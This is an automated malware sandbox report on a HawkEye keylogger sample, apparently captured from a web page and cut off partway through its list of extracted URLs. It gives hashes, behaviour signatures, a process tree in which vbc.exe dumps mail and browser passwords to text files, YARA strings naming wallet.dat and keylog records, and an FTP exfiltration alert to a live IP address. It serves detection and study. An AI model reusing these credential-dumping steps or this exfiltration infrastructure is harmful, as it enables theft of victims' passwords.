Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TGQfHfehsY

Overview

General Information

Sample Name:TGQfHfehsY (renamed file extension from none to exe)
Analysis ID:587288
MD5:9b8ec9e094676d88b02f038f318afd86
SHA1:65f99e529982f1c1a5cf9eb59f60edfeecdf2eec
SHA256:54fa4651e925e0fd845ca5652d57a010c26e4ab799211b8d3299cbb7dec35ae8
Tags:exe
Infos:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected MailPassView
Yara detected HawkEye Keylogger
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected HawkEye Rat
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Changes the view of files in windows explorer (hidden files and folders)
Yara detected WebBrowserPassView password recovery tool
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
May infect USB drives
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapater information

Classification

Process Tree

  • System is w10x64
  • TGQfHfehsY.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\TGQfHfehsY.exe" MD5: 9B8EC9E094676D88B02F038F318AFD86)
    • pjavpo.exe (PID: 6660 cmdline: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja MD5: 1294A9DDC96CAC3F16FAE32EA9D6670D)
      • pjavpo.exe (PID: 6720 cmdline: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja MD5: 1294A9DDC96CAC3F16FAE32EA9D6670D)
        • vbc.exe (PID: 580 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 5484 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
    • 0x7b748:$key: HawkEyeKeylogger
    • 0x7d946:$salt: 099u787978786
    • 0x7bd61:$string1: HawkEye_Keylogger
    • 0x7cbb4:$string1: HawkEye_Keylogger
    • 0x7d8a6:$string1: HawkEye_Keylogger
    • 0x7c14a:$string2: holdermail.txt
    • 0x7c16a:$string2: holdermail.txt
    • 0x7c08c:$string3: wallet.dat
    • 0x7c0a4:$string3: wallet.dat
    • 0x7c0ba:$string3: wallet.dat
    • 0x7d488:$string4: Keylog Records
    • 0x7d7a0:$string4: Keylog Records
    • 0x7d99e:$string5: do not script -->
    • 0x7b730:$string6: \pidloc.txt
    • 0x7b796:$string7: BSPLIT
    • 0x7b7a6:$string7: BSPLIT
    00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
        00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Click to see the 58 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.pjavpo.exe.7bf0000.21.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
          • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
          5.0.pjavpo.exe.400000.0.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
          • 0x1b67b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
          5.2.pjavpo.exe.4a29c0d.17.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            13.0.vbc.exe.400000.3.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              5.0.pjavpo.exe.41ce65.15.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                Click to see the 280 entries

                Sigma Signatures

                There are no malicious signatures, click here to show all signatures.

                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\TGQfHfehsY.exe, ProcessId: 6544, TargetFilename: C:\Users\user\AppData\Local\Temp\pjavpo.exe
                Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja, CommandLine: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\pjavpo.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\pjavpo.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\pjavpo.exe, ParentCommandLine: "C:\Users\user\Desktop\TGQfHfehsY.exe" , ParentImage: C:\Users\user\Desktop\TGQfHfehsY.exe, ParentProcessId: 6544, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja, ProcessId: 6660

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: TGQfHfehsY.exeVirustotal: Detection: 32%Perma Link
                Source: 3.2.pjavpo.exe.20e0000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 5.0.pjavpo.exe.415058.10.unpackAvira: Label: TR/Inject.vcoldi
                Source: 5.0.pjavpo.exe.400000.0.unpackAvira: Label: TR/Inject.vcoldi
                Source: 5.2.pjavpo.exe.4a20000.16.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 5.2.pjavpo.exe.4a20000.16.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 5.2.pjavpo.exe.4990000.15.unpackAvira: Label: TR/Inject.vcoldi
                Source: 5.2.pjavpo.exe.3803258.6.unpackAvira: Label: TR/Inject.vcoldi
                Source: 12.0.vbc.exe.400000.1.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 5.0.pjavpo.exe.400000.2.unpackAvira: Label: TR/Inject.vcoldi
                Source: 5.0.pjavpo.exe.415058.14.unpackAvira: Label: TR/Inject.vcoldi
                Source: 12.0.vbc.exe.400000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 3.2.pjavpo.exe.20f1458.2.unpackAvira: Label: TR/Inject.vcoldi
                Source: 5.2.pjavpo.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                Source: 5.2.pjavpo.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 5.0.pjavpo.exe.400000.3.unpackAvira: Label: TR/Inject.vcoldi
                Source: 5.2.pjavpo.exe.415058.3.unpackAvira: Label: TR/Inject.vcoldi
                Source: 5.0.pjavpo.exe.400000.1.unpackAvira: Label: TR/Inject.vcoldi
                Source: 12.0.vbc.exe.400000.2.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 12.0.vbc.exe.400000.3.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: 12.0.vbc.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                Source: unknownHTTPS traffic detected: 104.16.154.36:443 -> 192.168.2.4:49772 version: TLS 1.0
                Source: TGQfHfehsY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                Source: Binary string: C:\gfzfo\jdgvpo\ilxz\eb80024cfd9a4588b9c5c2bbb297cb83\uledka\mpuuwnfg\Release\mpuuwnfg.pdb source: TGQfHfehsY.exe, 00000001.00000002.265684302.000000000040B000.00000004.00000001.01000000.00000003.sdmp, pjavpo.exe, 00000003.00000000.229757777.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe, 00000003.00000002.245881929.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe, 00000005.00000000.232538937.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe.1.dr
                Source: Binary string: wntdll.pdbUGP source: pjavpo.exe, 00000003.00000003.242842960.000000001A030000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000003.00000003.236238654.000000001A1C0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.500841796.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: pjavpo.exe, 00000003.00000003.242842960.000000001A030000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000003.00000003.236238654.000000001A1C0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                Source: pjavpo.exeBinary or memory string: [autorun]
                Source: pjavpo.exeBinary or memory string: autorun.inf
                Source: pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
                Source: pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
                Source: pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                Source: pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                Source: pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                Source: pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                Source: pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: autorun.inf
                Source: pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
                Source: pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: autorun.inf
                Source: pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: [autorun]
                Source: pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                Source: pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeCode function: 1_2_00402630 FindFirstFileA,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_00404A29 FindFirstFileExW,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 12_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then mov esp, ebp
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then jmp 02301A73h
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then call 02301B20h
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then jmp 02301A73h
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]

                Networking

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                Source: TrafficSnort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.4:49782 -> 66.70.204.222:21
                May check the online IP address of the machine
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeDNS query: name: whatismyipaddress.com
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.16.154.36:443 -> 192.168.2.4:49772 version: TLS 1.0
                Source: Joe Sandbox ViewIP Address: 104.16.154.36 104.16.154.36
                Source: global trafficTCP traffic: 192.168.2.4:49783 -> 66.70.204.222:59592
                Source: unknownFTP traffic detected: 66.70.204.222:21 -> 192.168.2.4:49782 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 14:57. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 14:57. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 14:57. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 14:57. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                Source: vbc.exe, 0000000D.00000003.326084792.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325490889.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325673478.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.326155267.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.325833599.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.328322633.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327668619.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drString found in binary or memory: http://172.217.23.78/
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
                Source: vbc.exe, 0000000D.00000003.327330830.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327458849.000000000221A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327791462.000000000221A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/name=euconsent&value=&expire=0&isFirstRequest=truef5-b8c0-4
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                Source: pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://google.com/
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxYWZjY2Q0NWJhMmI1MGJkMWJjMzhmMGFlZWM2MDJmMjc2O
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjU5Zjc4ZGRjN2Y0NThlYzE2YmNhY2E0Y2E2YmFkYzgwNTYyZ
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjVhZWEwOTA0MmYxYzJjMDRlMmU1NDg1YzZmNjY2NTU5N2E5N
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijc4NDFiMmZlNWMxZGU2M2JkNDdjMGQzZWI3NjIzYjlkNWU5N
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImRjOWViNGY4OTFjMzQ4NTUyMWQyYWZlZDU1MmZmOWI0NzQyN
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Z
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABzUSt?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsAOZ?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv8D09.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsZuW?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
